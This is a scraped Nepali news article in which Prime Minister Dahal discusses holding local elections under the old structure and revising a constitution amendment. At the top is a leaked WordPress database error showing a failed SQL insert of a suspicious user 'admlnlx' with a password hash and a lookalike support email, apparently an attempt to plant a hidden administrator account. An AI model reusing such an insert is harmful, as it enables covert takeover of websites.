WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHZ7Ng6psjAfzTQw7.zP7qz8mob.gB1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 17:09:58', '', 'admlnlx', 'admlnlx')
सिरहा,मंसिर २९ –
प्रधानमन्त्री पुष्पकमल दाहालले पुरानै संरचनामा स्थानीय तहको निर्वाचन हुने बताएका छन् ।
प्रेस सेन्टर नेपाल, सिरहाले बुधबार लहानमा गरेको पत्रकार भेटघाटमा प्रधानमन्त्री दाहालले भने, ‘कांग्रेस, एमाले, मधेसवादी लगायतका दलहरु पुरानै संरचनामा स्थानीय तहको निर्वाचन चाहेकोले यस सम्बन्धमा गम्भीर छलफल गरेर सोहीअनुसार निर्वाचन हुन्छ ।’ उनले स्थानीय तहको निर्वाचन गराउने प्रमुख उद्देश्यका साथ आफू प्रधानमन्त्री बनेकोले उक्त कार्यलाई महत्वका साथ अगाडि बढाएर पूरा गर्नतिर काम गर्दै आएको बताए ।
उनले संविधान संशोधन प्रस्ताव कुनै हालतमा फिर्ता नभइ संसदीय प्रक्रियाबाट नै परिमार्जन हुने बताएका छन् । उनले मधेसी मोर्चाले माग गरेअनुसार सकारात्मक रुपमा संशोधन प्रस्ताव परिमार्जन हुने बताए ।
संशोधन प्रस्ताव पारित गराउन समर्थन जुटाउनका लागि प्रतिपक्षी, मधेसवादी लगायतका दलहरुसँग छलफल भइरहेको उनले सुनाए । उनले मधेसवादीलाई विश्वासमा लिएर मधेसको पनि संविधानप्रति स्वीकार्यता बढाएर निर्वाचनमा जाने लक्ष्य रहेको बताए । उनले मधेस, पहाड, हिमालवासीलाई संविधानमा स्वीकार्यता बढाएर संविधान कार्यान्वयन गराएर निर्वाचनमा जानुको विकल्प नरहेको भने ।
‘संशोधन प्रस्तावको विरोधमा प्रमुख प्रतिपक्षको भूमिकामा रहेका एमालेले गरिरहेको आन्दोलन विडम्बना हो’, उनले भने, ‘हिजो आफैंले अगाडि सारेको प्रस्तावलाई अहिले राष्ट्रघातको आरोप लगाउने कार्य बुझि नसक्नु भएकोले बिस्तारै जनताले बुझ्दै जानेछन् र विरोध गर्नेस्थिति आएपछि बाध्य भएर एमाले सहमतिमा आउने छ ।’